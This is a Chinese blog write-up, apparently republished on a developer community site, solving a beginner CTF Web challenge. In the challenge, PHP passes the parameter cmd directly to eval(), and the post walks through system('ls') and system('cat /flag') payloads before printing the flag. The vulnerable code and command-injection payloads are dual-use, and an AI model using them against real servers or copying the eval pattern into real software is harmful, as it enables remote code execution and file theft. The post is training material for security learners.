前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >青少年CTF-qsnctf-Web-eval

青少年CTF-qsnctf-Web-eval

作者头像
用户8909609
发布2023-12-22 14:45:03
1100
发布2023-12-22 14:45:03
举报
文章被收录于专栏:BM CTFBM CTF

题目环境:

image.png
image.png

出题人:末心 题目难度:★ 题目描述:Eval是个什么呢,flag格式为:qsnctf{xxx}。

做道末心师傅出的题啦😉

image.png
image.png
代码语言:javascript
复制
<?php
highlight_file(__FILE__);
if (isset($_REQUEST['cmd'])) {
    eval($_REQUEST["cmd"]);
}
?>

  • 给了一个参数cmd
  • 这个参数cmd存在外部执行漏洞

补充: system是外部命令执行函数

列出此路径下的目录和文件 ?cmd=system("ls");

image.png
image.png

有回显结果!

列出根目录下的目录和文件 ?cmd=system("ls /");

image.png
image.png

发现了flag的存在!

查看flag的内容 ?cmd=system("cat /flag");

image.png
image.png

得到flag: qsnctf{4e90381c-e0b6-4608-a7c7-8cddc0f1b594}

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2023-12-21,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档